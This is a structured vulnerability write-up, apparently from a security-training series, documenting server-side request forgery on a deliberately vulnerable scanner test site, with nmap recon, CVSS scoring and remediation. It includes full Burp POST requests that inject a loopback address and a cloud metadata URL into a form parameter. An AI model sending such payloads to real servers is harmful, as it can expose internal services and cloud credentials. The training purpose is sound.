## Version 1.4.1
## language: en
Feature:
  TOE:
    Web Scanner Test Site
  Category:
    Server Side Request Forgery
  Location:
    http://webscantest.com/crosstraining/sitereviews.php - Submit (button)
  CWE:
    CWE-918: Server-Side Request Forgery
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Use this web server as a proxy
  Recommendation:
    Create a white list of trusted pages
    Avoid passing user-submitted input to any filesystem/framework API
    Careful planning at the architectural and design phases

  Background:
  Hacker's software:
    | Name          | Version       |
    | Ubuntu        | 16.04         |
    | Firefox       | 72.0.02       |
    | Burpsuite     | 2.1.02        |
    | nmap          | 7.01          |
  TOE information:
    Given I am accesing the webpage
    """
    http://webscantest.com/crosstraining/sitereviews.php
    """
    When I get site IP address using command "nslookup webscantest.com"
    """
    Server:     127.0.1.1
    Address:    127.0.1.1#53

    Non-authoritative answer:
    Name:    webscantest.com
    Address: 69.164.223.208
    """
    Then I can see the IP Address information
    When I run "nmap -sC -sV -oA nmap 69.164.223.208"
    Then I can see the webpage information
    And is runing on Ubuntu 14.04.2 LTS
    And is running Apache/2.4.7 (Ubuntu)
    And is powered by PHP/5.5.9

  Scenario: Normal use case
  Page to submit product reviews
    Given I access http://webscantest.com/crosstraining/sitereviews.php
    Then I can see product reviews submitted
    When I submit my own review form
    Then the page refresh and I can see my product review

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't perform a static detection

  Scenario: Dynamic detection
  Verify if the web server restricts connections to itself
    Given I fill the review form in the webpage
    When I submit the POST request changing the submit parameter with Burp as:
    """
    POST /crosstraining/sitereviews.php HTTP/1.1
    Host: webscantest.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0)
                Gecko/20100101 Firefox/75.0
    Accept: text/html,application/xhtml+xml,application/xml;
            q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 136
    Referer: http://webscantest.com/crosstraining/sitereviews.php
    Cookie: TEST_SESSIONID=0l11rjkpmvfhqgmh4sh9bueqh7; NB_SRVID=srv140700;
            aspNetSim=1; __RequestVerificationToken=predefinedtoken;

    name=User&email=mail%40test.com&rating=1&title=data&description=data&
    Submit=127.0.1.1:80
    """
    Then The webpage works without problem
    And I can see server allows me to use itself as a proxy to send requests

  Scenario: Exploitation
    Given Website is Server Side Request Forgery vulnerable
    When I access the normal use case scenario
    Then I send the POST request using Burp to edit submit parameters as:
    """
    POST /crosstraining/sitereviews.php HTTP/1.1
    Host: webscantest.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0)
                Gecko/20100101 Firefox/75.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,
            image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 136
    Referer: http://webscantest.com/crosstraining/sitereviews.php
    Cookie: TEST_SESSIONID=0l11rjkpmvfhqgmh4sh9bueqh7; NB_SRVID=srv140700;
            aspNetSim=1; __RequestVerificationToken=predefinedtoken;

    name=John&email=mail%40test.com&rating=1&title=data&description=data&
    Submit=http%3A%2F%2F69.164.223.208%2Flatest%2Fmeta-data%2F
    """
    And I can see its AWS metadata [evidence](img1.png)
    And I successfully exploited SSRF

  Scenario: Remediation
    Given user supplied input into a server-based resource
    When I have firewall rules in place preventing new outbound connections
    And avoid passing user-submitted input to any filesystem/framework API
    Then attackers cant expose local resources or use the server as a proxy

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    7.5/10 (High) - E:H/RL:U/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.5/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
  No correlations have been found to this date 2020-05-05
